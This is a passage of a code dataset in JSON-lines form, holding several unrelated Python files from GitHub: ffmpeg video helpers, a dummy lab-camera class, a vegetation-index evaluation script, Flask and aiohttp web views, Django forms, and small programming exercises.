resize:960,720,,,,lanczos\n\tcmd3Resize = ' --vf resize:{width},{height},,,,lanczos'\n\t# cmd3Resize = ' --vf resize:width={width},height={height},method=spline'\n\tc = cmd\n\tif size and len(size)==2:\n\t\tc += cmd3Resize\n\t\tc = c.format(media=media , video=video ,width=size[0] , height=size[1])\n\telse :\n\t\tc = c.format(media=media , video=video)\n\trunCb(c , stdoutCb, stderrCb)\n\ndef merge(video,audio,output):\n\tcmd = 'ffmpeg -i {video} -i {audio} -c copy -y {output}'\n\t# cmd='ffmpeg -i {video} -i {audio} -vcodec copy -acodec copy -y {output}'\n\trun(cmd.format(video=video,audio=audio,output=output))\n\ndef resize(src_file , dst_file , size , threads=8):\n\tcmd = 'ffmpeg -i {} -y -s {} -threads {} {}'\n\trun(cmd.format(src_file,size,threads,dst_file))\n\ndef dash(output_dir,mpd,*src_files):\n\t# cwd = os.path.dirname(src_files[0])\n\tname ,_=os.path.splitext(mpd)\n\t# {in} {out}\n\tcmd1 = 'mp4fragment --fragment-duration 10000 {} {}'\n\tfrags = []\n\tfragbases = []\n\tfor sf in src_files :\n\t\tfrag = appendFileName(sf , \"_frag\")\n\t\tfrags.append(frag)\n\t\tfragbases.append(os.path.basename(frag))\n\t\trun(cmd1.format(sf , frag))\n\tcmd2 = 'mp4dash -f --mpd-name={mpd} --subtitles --exec-dir={output_dir} --media-prefix={name} --no-split --profiles=on-demand -o {output_dir} {mp4s}'\n\trun(cmd2.format(mpd=os.path.basename(mpd),name=name,output_dir=output_dir,mp4s=' '.join(fragbases)) , cwd=output_dir)\n\tfor f in frags:\n\t\tos.remove(f)\n\t# exe_cmd('mp4dash --help')\n\n\ndef clip(src_file ,dst_file,ss='00:00:00',duration=30):\n\tcmd = 'ffmpeg -ss {ss} -t {duration} -accurate_seek -i {src_file} -codec copy -y -avoid_negative_ts 1 {dst_file}'\n\tr = run(cmd.format(src_file=src_file,dst_file=dst_file,ss=ss,duration=duration))\n\treturn r\n\ndef snapshot(src_file,dst_file ,ss=30):\n\t# ss = ss + random.randint(0,60)\n\tcmd='ffmpeg -ss {ss} -i {src_file} -v quiet -y -f image2 -vframes 1 {dst_file}'\n\tr = run(cmd.format(src_file=src_file,dst_file=dst_file,ss=ss))\n\treturn r\n\n\ndef toMp4(media ,streams,stdoutCb=None,stderrCb=None):\n\tname,ext = os.path.splitext(media)\n\tcmd = \"ffmpeg -i {media} \"\n\tif streams['video']['codec_name']!='h264' :\n\t\tcmd += \" -vcodec h264\"\n\telse :\n\t\tcmd 
+=\" -vcodec copy\"\n\tif streams['audio']['codec_name']!='aac' :\n\t\tcmd +=\" -acodec aac\"\n\telse :\n\t\tcmd +=\" -acodec copy\"\n\tif ext==\".mp4\":\n\t\treturn media\n\tcmd += \" -y {output}\"\n\tc = cmd.format(media=media,output=name+\".mp4\")\n\trunCb(c,stdoutCb,stderrCb)\n\treturn name+\".mp4\"\n\n\nif '__main__' == __name__:\n\n\tpsizes =[[1920,1080],[1280,720],[640,480]]\n\tm = Mp4(\"/Users/ququ/Movies/test2/1.flv\" , psizes)\n\tprint(m.streams)\n\tprint(m.format)\n\tprint(m.isMp4())\n\tm = Mp4(\"/Users/ququ/Movies/test1/1_1.mp4\" , psizes)\n\tprint(m.streams)\n\tprint(m.format)\n\tprint(m.isMp4())\n# \tm.compress()\n\t# m.compressDash()\n\t# m.dash(\"/Users/ququ/Movies/test4/mal052_lec01_1.mp4\",\"/Users/ququ/Movies/test4/mal052_lec01_2.mp4\",\"/Users/ququ/Movies/test4/mal052_lec01_3.mp4\")\n","repo_name":"RocksonZeta/httpfs","sub_path":"bin/videos.py","file_name":"videos.py","file_ext":"py","file_size_in_byte":16375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43796751444","text":"from HCIFS.Device.Device import Device\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass Camera(Device):\n \"\"\"\n A dummy class to represent a connected camera\n \"\"\"\n \n def __init__(self, originPix=[0,0], imgSize=[500,500], binPix=[4,4], \n ccdtemp=0, darkCam=None, saturation = 50000, **specs):\n \"\"\"\n Constructor for the camera class. Uses the parent 'Device' class.\n Inputs:\n originPix - the starting position of the image (tuple len.2)\n imgSize - the dimensions of the image (tuple len. 2)\n binPix - the number of pixels for binning (tuple len. 2)\n ccdtemp - the celsius temperature the camera is set to (number)\n darkCam - image used to reduce dark current (np array)\n saturation - saturation value for the QSIrs61 (int)\n \"\"\"\n \n # call the Device constructor\n super().__init__(**specs)\n \n # load specific Camera attributes\n self.connection = None\n self.originPix = np.array(specs.get('originPix', originPix), dtype = 'int')\n self.imgSize = np.array(specs.get('imgSize', imgSize), dtype = 'int')\n self.binPix = np.array(specs.get('binPix', binPix), dtype = 'int')\n self.ccdtemp = int(specs.get('ccdtemp', ccdtemp))\n self.darkCam = specs.get('darkCam', darkCam)\n self.saturation = int(specs.get('saturation', saturation))\n \n def avgImg(self, expTime, numIm, Xc = None, Yc = None, Rx = None,\n Ry = None, Source = None):\n \"\"\"\n A dummy function for taking an averaged image with the camera. Uses the exposure\n properties already passed to exposure properties. The current darkCam is used.\n If one is not found, a new one is taken. It also crops the image based\n on the X, Y and R parameters. The defaults for these paramters will keep simply\n not crop the image.\n \n Inputs:\n expTime - the exposure time in seconds for each image taken\n numIm - the number of images to take and then average\n Xc - the x-coordinate of center of the image after it is cropped in pixels\n Yc - the y-coordinate of center of the image after it is cropped in pixels\n Rx - the x radius of the rectangle used for cropping in pixels\n Ry - the y radius of the rectangle used for cropping in pixels\n Source - used only for taking Starlight's dark image\n \n Outputs:\n image - a numpy array containing the image. 
It's size matches the imgSize attribute\n saturated - True if image has reached camera's saturation level, False otherwise\n \n \"\"\"\n assert not self.labExperiment, \"Can't use 'avgImg' with default 'Camera' class.\"\n print(\"Turn 'labExperiment = True' to run the lab.\")\n return np.zeros(self.imgSize), False\n \n def exposure(self, exptime):\n \"\"\"\n Dummy function for taking an image\n \n Inputs:\n exptime - exposure time in seconds for the image\n \n Outputs:\n image - a numpy array with properties corresponding to the values passed to exposureProperties\n \"\"\"\n assert not self.labExperiment, \"Can't use 'exposure' with default 'Camera' class.\"\n print(\"Turn 'labExperiment = True' to run the lab.\")\n return np.zeros(self.imgSize)\n\n def exposureProperties(self, originPix, imgSize, binPix):\n \"\"\"\n A dummy function for changing the exposure properties of the camera\n \n Input:\n originPix - tuple of length two of the starting location for the image\n imgSize - tuple of length two of the image size in pixels\n binPix - tuple of length two of the number of pixels binned together\n \"\"\"\n # makes sure tuple input is all of length two\n if len(originPix) != 2:\n raise ValueError('Wrong dimension of start position')\n if len(imgSize) != 2:\n raise ValueError('Wrong dimension of picture size')\n if len(binPix) != 2:\n raise ValueError('Wrong dimension of binned pixels')\n # sets attributes to be equal to the input values\n self.originPix = originPix\n self.imgSize = imgSize\n self.binPix = binPix\n \n def readoutSpeed(self, readoutflag):\n \"\"\"\n Dummy function for changing the readout speed of the camera\n \n Inputs:\n readoutflag - 0 for high image quality, 1 for fast readout\n \"\"\"\n assert not self.labExperiment, \"Can't use 'readoutSpeed' with default 'Camera' class.\"\n print(\"Turn 'labExperiment = True' to run the lab.\")\n\n def realTime(self):\n \"\"\"\n Dummy function for creating a realtime feed of the camera in a separate figure window.\n Pauses execution until the figure is closed.\n \"\"\"\n if self.labExperiment == True:\n if self.connection == None:\n raise Exception('Camera not connected.')\n # creates the figure\n plt.figure(100)\n plt.title('Real Time Picture')\n plt.tight_layout()\n # updates the figure with the current image until the figure is closed\n while plt.fignum_exists(100):\n img = self.exposure(0.0003)\n plt.imshow(img, origin = 'lower')\n cb = plt.colorbar()\n plt.pause(.1)\n cb.remove()\n else:\n raise Exception(\"Can't use 'realTime' with default 'Camera' class.\")\n print(\"Turn 'labExperiment = True' to run the lab.\")\n\n def setTemperature(self, temperature):\n \"\"\"\n Dummy function for setting camera's cooler temperature\n \n Inputs:\n temperature - temperature in degrees celsius\n \"\"\"\n assert not self.labExperiment, \"Can't use 'setTemperature' with default 'Camera' class.\"\n print(\"Turn 'labExperiment = True' to run the lab.\")\n\n def takeDarkCam(self, expTime, numIm, Source = None, Xc = None, Yc = None,\n Rx = None, Ry = None, display = False):\n \"\"\"\n Dummy function for taking a dark cam. 
Uses the average image function.\n \n See average image function for inputs and outputs\n \n Inputs:\n display - if True displays the darkCam after it is taken\n \"\"\"\n assert not self.labExperiment, \"Can't use 'takeDarkCam' with default 'Camera' class.\"\n print(\"Turn 'labExperiment = True' to run the lab.\")\n return np.zeros(self.imgSize)\n","repo_name":"ChrisDelaX/HCIFS","sub_path":"HCIFS/Device/Camera/Camera.py","file_name":"Camera.py","file_ext":"py","file_size_in_byte":6645,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"7535952252","text":"import os\nimport cv2\nimport math\nimport argparse\nimport bob.measure\nimport numpy as np\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport Utils\n\nfrom joblib import Parallel, delayed\nimport multiprocessing\n\n# Hold the eer (Equal error rate) for each index\neers = []\n\n# Argument parsing\nparser = argparse.ArgumentParser(description='Extract vegetation indexes.')\nparser.add_argument('-i', action='store', dest='inputList')\nparser.add_argument('-f', action='store', dest='filterType')\nparser.add_argument('-o', action='store', dest='outputDir')\nargs = parser.parse_args()\n\nfilterType = 0\n\ndef parallel(j, pos, indP, indF):\n\tif(j in pos[0]):\n\t\tindP[j]=1\n\t\tindF[j]=0\n\telse:\n\t\tindP[j]=0\n\t\tindF[j]=1\n\ndef balanced_accuracy(label, predicted):\n k = [0,1]\n E = [None]*2\n for i in range(0,2):\n pos = np.where(label==k[i])\n indP = [None]*label.shape[0]\n indF = [None]*label.shape[0]\n\n num_cores = multiprocessing.cpu_count()\n Parallel(n_jobs=num_cores)(delayed(parallel)(i, pos, indP, indF) for i in range(0,label.shape[0]))\n # for j in range(0,label.shape[0]):\n # if(j%10000 == 0):\n # print(j)\n # if(j in pos[0]):\n # indP[j]=1\n # indF[j]=0\n # else:\n # indP[j]=0\n # indF[j]=1\n \n Nc = len(np.where(label == k[i])[0])\n \n a=[]\n print(\"len \"+len(indF))\n for j in range(0,len(indF)):\n if(indF[j] == 1):\n a.append(j)\n posVec = [predicted[j] for j in a]\n\n FP = 0\n for j in range(0, len(a)):\n if(predicted[a[j]] == k[i]):\n FP = FP+1\n e1 = float(FP)/(label.shape[0] - Nc)\n \n b=[]\n for j in range(0,len(indP)):\n if(indP[j] == 1):\n b.append(j)\n posVec = [predicted[j] for j in b]\n\n FN = 0\n for j in range(0, len(b)):\n if(predicted[b[j]] != k[i]):\n FN = FN+1\n \n e2 = float(FN)/Nc\n \n E[i] = e1+e2\n return 1 - sum(E)/4\n\n'''\n\tCalculate the accuracy\n\t@param label The ground truth\n\t@param targets List of arrays with the prediction of each pixel\n'''\ndef accuracy_late(label, targets):\n\ti = 0\n\tprint(\"\\n-------------\\n|Method|Accuracy|\\n|:----------:|:-------------:|\")\n\tfor target in targets:\n\t\tprint(\"|\"+Utils.lateFusionLabels[i]+\"|\"+\"%.3f\" % metrics.accuracy_score(label, target)+\"|\")\n\t\ti += 1\n\n'''\n\tPlot the ROC curve and calculate the AUC, ERR, FAR and FRR\n\t@param label The ground truth\n\t@param targets List of arrays with the index value of each pixel\n\t@param labels Label of each curve that will be plotted\n'''\ndef plot_roc(label, targets, labels, fusion):\n\ti = 0\n\tprint(\"\\n-------------\\n|Method|AUC|EER|FAR|FRR|Accuracy|\")\n\tprint(\"|:----------:|:-------------:|:------:|:------:|:------:|:------:|\")\n\tfor target in targets:\n\t\t# if(np.any(np.isnan(target))):\n\t\ttarget[ ~ np.isfinite( target )] = 0\n\t\t# target[ ~ np.isnan( target )] = 0\n\t\t# Use SKLearn to get the False Positive Rate (fpr), True Positive Rate(tpr)\n\t\tfpr, tpr, thresholds = metrics.roc_curve(label, 
target)\n\n\t\tprint(\"|\"+labels[i]+\"|\"+\"%.3f\" % metrics.roc_auc_score(label, target),end='')\n\n\t\t# Plot the FPR vs TPR (ROC curve)\n\t\tplt.plot(fpr[::200], tpr[::200], lw=2, label=labels[i])\n\t\t# Plot the straight to show the EER point\n\t\tplt.plot(np.array((1.00,0)), np.array((0,1.00)))\n\t\ti += 1\n\n\t\t# Build an array where positive class will the their values, but the negative class will receive -1\n\t\tpos = np.where(label, target, -1)\n\t\t# Get position of all positive pixel (the position that isnt -1 value)\n\t\tposPos = np.where(pos>-1)\n\t\t# Build the array with only the values of positive class\n\t\tposVec = [target[j] for j in posPos]\n\n\t\t''' The same as the previous, but now for the negative class '''\n\t\tneg = np.where(1-label, target, -1)\n\t\tnegPos = np.where(neg>-1)\n\t\tnegVec = [target[j] for j in negPos]\n\t\t\n\t\t# Use the Bob package from IDIAP\n\t\t# Get the err value (Value where the False Acceptance Rate and the False Rejection Rate are equal)\n\t\teer = bob.measure.eer_threshold(negVec[0], posVec[0])\n\t\tfar, frr = bob.measure.farfrr(negVec[0], posVec[0], eer)\n\t\teers.append(eer)\n\n\t\tprediction = np.where(target >= eer, 1, 0)\n\t\tacc = metrics.balanced_accuracy_score(label, prediction)\n\n\t\tprint(\"|\"+\"%.3f\" % eer+\"|\"+\"%.3f\" % far+\"|\"+\"%.3f\" % frr+\"|\"+\"%.3f\" % acc+\"|\")\n\n\n\tplt.legend()\n\tplt.xlabel(\"False Positive Rate - FPR\")\n\tplt.ylabel(\"True Positive Rate - TPR\")\n\t# plt.show()\n\tplt.savefig(Utils.buildFileName(filterType, fusion, args.outputDir))\n\tplt.clf()\n\n'''\n\tDo the processing for the early fusion methods, which are the Arithmetic mean and the Geometric mean\n\t@param label The ground truth, just pass forward in function call sequence\n\t@param indices The value of each pixel for all the indeces\n'''\ndef early_fusion(label, indices):\n\tearly_fusion_results = []\n\t# Mean\n\tmean = indices[0]\n\tfor i in range(1,len(indices),1):\n\t\tmean = (mean + indices[i])\n\tmean = mean/len(indices)\n\tearly_fusion_results.append(mean)\n\t\n\t# Geometric mean\n\t# P = produtorio(P(i)[x,y])/(produtorio(P(i)[x,y]) + produtorio(1-P(i)))\n\tgeometricMean = indices[0]\n\tgeometricMeanRenorm = 1 - indices[0]\n\tfor i in range(1,len(indices),1):\n\t\tgeometricMean = geometricMean*indices[i]\n\t\tgeometricMeanRenorm = geometricMeanRenorm*(1-indices[i])\n\tgeometricMean = geometricMean/(geometricMean + geometricMeanRenorm)\n\tearly_fusion_results.append(geometricMean)\n\n\tplot_roc(label, early_fusion_results, Utils.earlyFusonLabels, \"earlyFusion\")\n\n'''\n\tDo the processing for the late fusion method, which is the majority voting\n\t@param label The ground truth, just pass forward in function call sequence\n\t@param indices The value of each pixel for all the indeces\n'''\ndef late_fusion(label, indices):\n\ti = 0\n\tlate_fusion_results = []\n\tindicesThresholdeds = []\n\tfor indice in indices:\n\t\t# Where the value of the prediction is greater or equal to EER value of that indice, 1 otherwise 0\n\t\tindicesThresholdeds.append(np.where(indice >= eers[i], 1, 0))\n\t\ti += 1\n\n\t# Sum all the value\n\tfor idx in range(1, len(indicesThresholdeds)):\n\t\tindicesThresholdeds[0] = np.add(indicesThresholdeds[0], indicesThresholdeds[idx])\n\t\n\t# Where the sum of the 1's is greater than half of the indices, mean that this prediction has the majority of the votes\n\tlate_fusion_results.append(np.where(indicesThresholdeds[0] >= math.floor(len(Utils.idxsLabels)/2)+1, 1, 0).astype(float))\n\taccuracy_late(label, 
late_fusion_results)\n\ndef filterImg(imgPath):\n\tglobal filterType\n\timg = cv2.imread(imgPath, cv2.IMREAD_COLOR)\n\n\tif filterType == 0: # No filter\n\t\treturn img\n\telif filterType == 1: # Normal blur\n\t\treturn cv2.blur(img,(5,5))\n\telif filterType == 2: # Gaussian blur\n\t\treturn cv2.GaussianBlur(img,(5,5),0)\n\telif filterType == 3: # Median blur\n\t\treturn cv2.medianBlur(img,5)\n\telif filterType == 4: # Bilateral filter\n\t\treturn cv2.bilateralFilter(img,3,25,75) #src,dst,d,sigmaColor,sigmaSpace; | sigmaColor High sigmaColor mean that father color well be mixed together\n\n\n'''\n\t\n'''\ndef process(imgs):\n\tgtAllImgs = np.array([])\n\tindices = [np.array([])]*6\n\tfor i in imgs:\n\t\tindexes = []\n\n\t\t# Read original image and the ground truth\n\t\timg = filterImg(i[0])\n\t\tgt = cv2.imread(i[1], cv2.IMREAD_GRAYSCALE)\n\n\t\ty,x = gt.shape\n\t\tif(img.shape != gt.shape):\n\t\t\ty, x = gt.shape\n\t\t\timg = img[0:y,0:x,]\n\t\t\n\t\t# Normalize the ground truth\n\t\tcv2.normalize(gt, gt, 0.0, 1.0, cv2.NORM_MINMAX)\n\t\t# Build a vector with all the ground truths\n\t\tgtAllImgs = np.concatenate((gtAllImgs, gt.ravel()))\n\n\t\t# Separate each channel\n\t\tB, G, R = cv2.split(np.float32(img))\n\t\tb = Utils.div0(B,(B+G+R))\n\t\tg = Utils.div0(G,(B+G+R))\n\t\tr = Utils.div0(R,(B+G+R))\n\n\t\t# NGRDI\n\t\tNGRDI = Utils.div0((G-R),(G+R))\n\t\tcv2.normalize(NGRDI, NGRDI, 0.0, 1.0, cv2.NORM_MINMAX)\n\t\tindices[0] = np.concatenate((indices[0], NGRDI.ravel()))\n\t\t# cv2.normalize(NGRDI, NGRDI, 0.0, 255.0, cv2.NORM_MINMAX)\n\t\t# NGRDI = np.uint8(NGRDI)\n\t\t# cv2.imwrite(\"NGRDI.jpg\", NGRDI)\n\n\t\t# ExG\n\t\t# ExG = 2*gNorm-rNorm-bNorm\n\t\tExG = 2*g-r-b\n\t\tcv2.normalize(ExG, ExG, 0.0, 1.0, cv2.NORM_MINMAX)\n\t\tindices[1] = np.concatenate((indices[1], ExG.ravel()))\n\t\t# cv2.normalize(ExG, ExG, 0.0, 255.0, cv2.NORM_MINMAX)\n\t\t# ExG = np.uint8(ExG)\n\t\t# cv2.imwrite(\"ExG.jpg\", ExG)\n\n\t\t# CIVE\n\t\tCIVE = 0.411*R - 0.881*G + 0.385*B + 18.78745\n\t\tCIVE = 1 - cv2.normalize(CIVE, CIVE, 0.0, 1.0, cv2.NORM_MINMAX)\n\t\tindices[2] = np.concatenate((indices[2], CIVE.ravel()))\n\t\t# cv2.normalize(CIVE, CIVE, 0.0, 255.0, cv2.NORM_MINMAX)\n\t\t# CIVE = np.uint8(CIVE)\n\t\t# cv2.imwrite(\"CIVE.jpg\", CIVE)\n\n\t\t# VEG\n\t\tVEG = Utils.div0(g, 2+(r**0.667)*(b**(1-0.667)))\n\t\tcv2.normalize(VEG, VEG, 0.0, 1.0, cv2.NORM_MINMAX)\n\t\tindices[3] = np.concatenate((indices[3], VEG.ravel()))\n\t\t# cv2.normalize(VEG, VEG, 0.0, 255.0, cv2.NORM_MINMAX)\n\t\t# VEG = np.uint8(VEG)\n\t\t# cv2.imwrite(\"VEG.jpg\", VEG)\n\n\t\t# ExGR\n\t\tExGR = g-(2.4*r)-b\n\t\tcv2.normalize(ExGR, ExGR, 0.0, 1.0, cv2.NORM_MINMAX)\n\t\tindices[4] = np.concatenate((indices[4], ExGR.ravel()))\n\t\t# cv2.normalize(ExGR, ExGR, 0.0, 255.0, cv2.NORM_MINMAX)\n\t\t# ExGR = np.uint8(ExGR)\n\t\t# cv2.imwrite(\"ExGR.jpg\", ExGR)\n\n\t\t# WI\n\t\tWI = Utils.div0((g-b),(abs(r-g)+1))\n\t\tcv2.normalize(WI, WI, 0.0, 1.0, cv2.NORM_MINMAX)\n\t\tindices[5] = np.concatenate((indices[5], WI.ravel()))\n\t\t# cv2.normalize(WI, WI, 0.0, 255.0, cv2.NORM_MINMAX)\n\t\t# WI = np.uint8(WI)\n\t\t# cv2.imwrite(\"WI.jpg\", WI)\n\n\tplot_roc(gtAllImgs, indices, Utils.idxsLabels, \"noFusion\")\n\tearly_fusion(gtAllImgs, indices)\n\tlate_fusion(gtAllImgs, indices)\n\n\ndef main():\n\t# y_true = [1, 1, 1, 0]\n\t# y_pred = [1, 1, 0, 0]\n\t# print(metrics.balanced_accuracy_score(y_true,y_pred))\n\tglobal filterType\n\twith open(args.inputList, 'r') as file:\n\t\tlines = file.readlines()\n\t\timgs = []\n\t\tfor line in 
lines:\n\t\t\timgs.append(line.rstrip().split(' '))\n\tfilterType = int(args.filterType)\n\tprocess(imgs)\nif __name__=='__main__':\n\tmain()\n\n\n","repo_name":"pauloprado/pdi","sub_path":"src/indexExtractor.py","file_name":"indexExtractor.py","file_ext":"py","file_size_in_byte":9883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33047323230","text":"# coding=utf-8\nfrom flask import g, render_template, make_response\nfrom .blueprint import blueprint\n#from .models import User\n\n@blueprint.route(\"/\")\ndef index():\n\t#g.db_session.add(User('jack'))\n\t#g.db_session.commit()\n\tnavigation = [\n\t\t\t{\"caption\": u\"首页\", \"href\": \"#\"},\n\t\t\t{\"caption\": u\"关于中宇\", \"href\": \"#\"},\n\t\t\t{\"caption\": u\"新闻中心\", \"href\": \"#\"},\n\t\t\t{\"caption\": u\"品牌\", \"href\": \"#\"},\n\t\t\t{\"caption\": u\"浴室空间\", \"href\": \"#\"},\n\t\t\t{\"caption\": u\"产品展示\", \"href\": \"#\"},\n\t\t\t{\"caption\": u\"销售专区\", \"href\": \"#\"},\n\t]\n\treturn render_template('index.html', navigation=navigation)\n\n@blueprint.route(\"/download/\")\ndef download(path):\n\tresponse = make_response()\n\tresponse.headers['Cache-Control'] = 'no-cache'\n\tresponse.headers['Content-Type'] = 'application/zip'\n\tresponse.headers['X-Accel-Redirect'] = '/files/' + path\n\treturn response\n","repo_name":"vuuvv/vweb.old","sub_path":"blog/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"41614271057","text":"from WWW.WebService.Base.BaseService import BaseService\n\nfrom Helper.JsonDateHelper import JSONEncoder\n\n\nfrom aiohttp import web\n\n\nclass NewsService(BaseService):\n\n def __init__(self):\n super().__init__()\n self.collection = self.db.create_collection(self.config[\"database\"][\"collection\"])\n self.text_collection = self.config[\"database\"][\"text_collection\"]\n self.news_query = self.config[\"database\"][\"query\"]\n self.check_for = self.config[\"check_for\"]\n\n def add_news(self, app):\n app.router.add_get('/random_news', self.__random_news_handler)\n\n async def __random_news_handler(self, request):\n filtered_news = list(self.collection.aggregate(self.news_query))[0]\n news_text = self.get_news_data(self.db, self.text_collection, filtered_news[\"url\"])\n res = {\n 'id': str(news_text.get('_id')),\n 'title': news_text.get('title'),\n 'summery': news_text.get('summery'),\n 'category': news_text.get('category'),\n 'article': news_text.get('article'),\n 'url': news_text.get('url'),\n 'authors': news_text.get('authors'),\n 'news_date': str(news_text.get('date')),\n 'wiki_relatedness': filtered_news.get('wiki_relatedness'),\n 'tweet_count': filtered_news.get('tweet_count'),\n 'tweet_percentage': filtered_news.get('tweet_percentage'),\n 'wiki_relatedness_nor': self.get_key_from(\"wiki_relatedness_nor\", filtered_news),\n 'tweet_count_nor': self.get_key_from(\"tweet_count_nor\", filtered_news),\n 'check_for': self.check_for\n }\n res = JSONEncoder().encode(res)\n return web.json_response(res)\n\n @staticmethod\n def get_key_from(key, array):\n if key in array:\n return array.get(key)\n else:\n return \"Not Found\"\n\n @staticmethod\n def get_news_data(db, collection, object_id):\n query = {\"url\": object_id}\n return db.get_data_one(collection, 
query)","repo_name":"KaanYT/PricePrediction","sub_path":"WWW/WebService/NewsService.py","file_name":"NewsService.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28232502993","text":"if __name__ == '__main__':\n N = int(input())\n ar=[]\n for _ in range(N):\n choices = input().strip().split(\" \")\n func = choices[0]\n if func == \"print\":\n print(ar)\n elif func == \"sort\":\n ar.sort()\n elif func == \"reverse\":\n ar.reverse()\n elif func == \"pop\":\n ar.pop()\n elif func == \"remove\":\n val = int(choices[1])\n ar.remove(val)\n elif func == \"append\":\n val = int(choices[1])\n ar.append(val)\n elif func == \"insert\":\n pos = int(choices[1])\n val = int(choices[2])\n ar.insert(pos, val)","repo_name":"Madhavarora05/HackerRank_Python_Solutions","sub_path":"Basic Data Types/Lists.py","file_name":"Lists.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"284855594","text":"from django.core.exceptions import ValidationError\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom django.forms import ModelForm\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.forms import inlineformset_factory\nfrom shared.models import Address\nfrom employee.models import Employee, Contract\nfrom company.models import Company\n# from attendance.models import EmployeeAttendance\n\n\nclass RegisterForm(UserCreationForm):\n\n class Meta:\n model = User\n fields = [\n 'username',\n 'email',\n 'password1',\n 'password2',\n ]\n\n\nclass DateInput(forms.DateInput):\n input_type = 'date'\n\n\nclass CompanyForm(ModelForm):\n\n class Meta:\n model = Company\n fields = ['name', 'contact_number', 'email']\n\n\nclass ContractForm(ModelForm):\n def __init__(self, *args, **kwargs):\n super(ContractForm, self).__init__(*args, **kwargs)\n self.fields['start_date'].widget.attrs['class'] = 'startDate'\n self.fields['end_date'].widget.attrs['class'] = 'endDate'\n # start_date = forms.DateField(widget=forms.TextInput(attrs={'class':'startDate'}))\n # end_date = forms.DateField(widget=forms.TextInput(attrs={'class':'endDate'}))\n \n class Meta:\n model = Contract\n fields = ['name', 'start_date', 'end_date', 'salary', 'employee']\n \n \nclass AddressForm(ModelForm):\n class Meta:\n model = Address\n fields = ['street_line1', 'street_line2', 'zipcode',\n 'city', 'state', 'employee', 'company']\n exclude = ('employee', 'company')\n\n\n\n\nclass EmployeeForm(ModelForm):\n\n class Meta:\n model = Employee\n fields = ['title', 'firstname', 'lastname', 'email',\n 'date_of_birth', 'date_of_joining']\n\n\nContractFormSet = inlineformset_factory(Employee, Contract,\n form=ContractForm, extra=1)\nAddressFormSet = inlineformset_factory(Employee, Address,\n form=AddressForm, extra=1)\nCompanyAddressFormSet = inlineformset_factory(Company, Address,\n form=AddressForm, extra=1)\n\n# class EmployeeAttendanceForm(ModelForm):\n# class Meta:\n# model = EmployeeAttendance\n# fields = ['employee_id', 'date', 'status', 'note']","repo_name":"DamodarVishwakarma/EMP","sub_path":"EMP/apps/employee/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13347191539","text":"from datetime import datetime, time\n\n\ndef current_time():\n \"\"\"Returns the current time in a readable 
format with params for the clock\"\"\"\n    while True:\n        dt = datetime.now().strftime(\"%d-%m-%Y %H:%M:%S\")\n        if time(8, 0) <= datetime.now().time() <= time(18, 0):\n            return f'Greetings traveller! Site is working! {dt}'\n        else:\n            return f'Good evening traveller! Site is working, but no one will answer your question!' \\\n                   f'{dt}
'\n\n\ndef average_height_weight():\n \"\"\"Returns the average height and weight of the users from file\"\"\"\n user = {}\n with open('hw.csv', 'r') as f:\n next(f)\n for line in f:\n ind, height, weight = line.split(',')\n user[ind] = [float(height), float(weight)]\n avg_height = round((sum(user[ind][0] for ind in user) * 2.54) / len(user), 2) # [0] index\n avg_weight = round((sum(user[ind][1] for ind in user) / 2.2046) / len(user), 2) # [1] index\n return avg_height, avg_weight\n\n\ndef show_requirements():\n \"\"\"Returns the requirements for the project\"\"\"\n req = []\n with open('requirements.txt', 'r') as f:\n for line in f:\n req.append(line.strip())\n return '
'.join(req)\n","repo_name":"HansLanda96/Flaskrep_Hillel","sub_path":"Flask_intro/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20108189113","text":"import matplotlib\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom celluloid import Camera\n\n#load irrigation dataset\nirrigated_land = pd.read_csv('datasets/land_under_Irrigation.csv')\n#print(irrigated_land.head())\n# animation\nfig = plt.figure(figsize=(80,40))\ncamera = Camera(fig) # bind camera object to matplotlib figure\nfor index, row in irrigated_land.iterrows():\n t = plt.bar(row['OBJECTID'], row['Total_Count'])\n plt.legend(t, [f'County {row[\"County\"]}'])\n plt.title(\"Total acres of Land under Irrigation per County\")\n camera.snap()\n\nanimation = camera.animate()\nanimation.save('celluloid_legends.gif', writer = 'imagemagick')","repo_name":"laranea/DataScience-Dashboard","sub_path":"celluloid_gif.py","file_name":"celluloid_gif.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"20632045179","text":"#Zadanie 05\n#Wypisz wszystkie liczby pierwsze z przedziału <2,10> wykorzystując instrukcję: for ... else lub while ... else. done \n\n#Użyj instrukcji break przy znalezieniu pierwszego dzielnika naturalnego innego niż 1 i dana liczba.\n#W bloku else umieść informację o znalezieniu liczby pierwszej.\nx = 1\nwhile x < 10:\n x += 1\n check = 0\n for a in range(x):\n a += 1\n if( x/a == x//a):\n check += a\n if(check == x +1):\n print(x, \"jest liczba pierwsza\") #totalnie zle jest to zadanie mozna je pewnie zrobic w 3 linijki, ale dziala \n","repo_name":"How2Troll/Python_Exercises","sub_path":"Zadanie5.py","file_name":"Zadanie5.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7853775755","text":"import zipfile\nfrom pprint import pprint\nfrom typing import List\n\nfrom fastapi import FastAPI, UploadFile, 